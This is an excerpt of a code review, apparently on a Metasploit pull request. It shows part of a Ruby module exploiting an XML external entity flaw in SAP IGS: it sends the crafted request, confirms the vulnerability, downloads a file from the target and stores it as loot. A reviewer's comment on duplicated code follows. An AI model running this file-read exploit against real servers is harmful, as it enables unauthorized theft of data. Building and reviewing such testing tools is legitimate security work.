modules/auxiliary/admin/sap/sap_igs_xxe.rb

```diff
@@ -0,0 +1,420 @@
+      first_response = send_request_cgi(
+          {
+              'uri' => normalize_uri(@urn),
+              'method' => 'POST',
+              'ctype' => "multipart/form-data; boundary=#{data.bound}",
+              'data' => data.to_s,
+          }, @timeout
+      )
+    rescue => e
+      print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@urn}")
+      if @verbose
+        print_error("Error: #{e.class}: #{e}")
+      end
+    end
+    # endregion
+
+    # region Check HTTP response
+    begin
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.code == 200
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless "Content-Type".in? first_response.headers
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.headers['Content-Type'].strip.start_with?('text/html')
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "Picture"
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "Info"
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.match? /ImageMap|Errors/
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless first_response.body.include? "/output/"
+    rescue NameError
+      fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}")
+    end
+    # endregion
+
+    # region Report Vulnerability
+    report_vuln(
+        host: @host,
+        port: @port,
+        name: self.name,
+        refs: self.references
+    )
+    # endregion
+
+    # region Download remote file
+    get_download_link(first_response.body)
+    if @download_link
+      begin
+        second_response = nil
+        second_response = send_request_cgi(
+            {
+                'uri' => normalize_uri(@download_link),
+                'method' => 'GET'
+            }
+        )
+      rescue => e
+        print_error("Failed to retrieve SAP IGS page: #{@schema}#{@host}:#{@port}#{@download_link}")
+        if @verbose
+          print_error("Error: #{e.class}: #{e}")
+        end
+      end
+      begin
+        fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}") unless second_response.code == 200
+        get_file_content(second_response.body)
+      rescue NameError
+        fail_with(Failure::NotVulnerable, "#{@schema}#{@host}:#{@port}#{@urn}")
+      end
+      if @verbose
+        print_good("File: #{@file} content from host: #{@host}\n#{@file_content}")
+      end
+      loot = store_loot('sap.igs.xxe', 'text/plain', @host, @file_content)
+      print_good("File: #{@file} saved in: #{loot.to_s}")
+    else
+      print_status("System is vulnerable, but not found file: #{@file} on host: #{@host}")
+    end
+    # endregion
+
+  end
+
+  def action_dos
```

Comment:
A lot of the code for this function seems similar to the code for the `check` method, which is in turn similar to the code for the `action_file_read` function. I would look at trying to reduce code reuse throughout your module as it seems a lot of these functions perform nearly identical actions at times.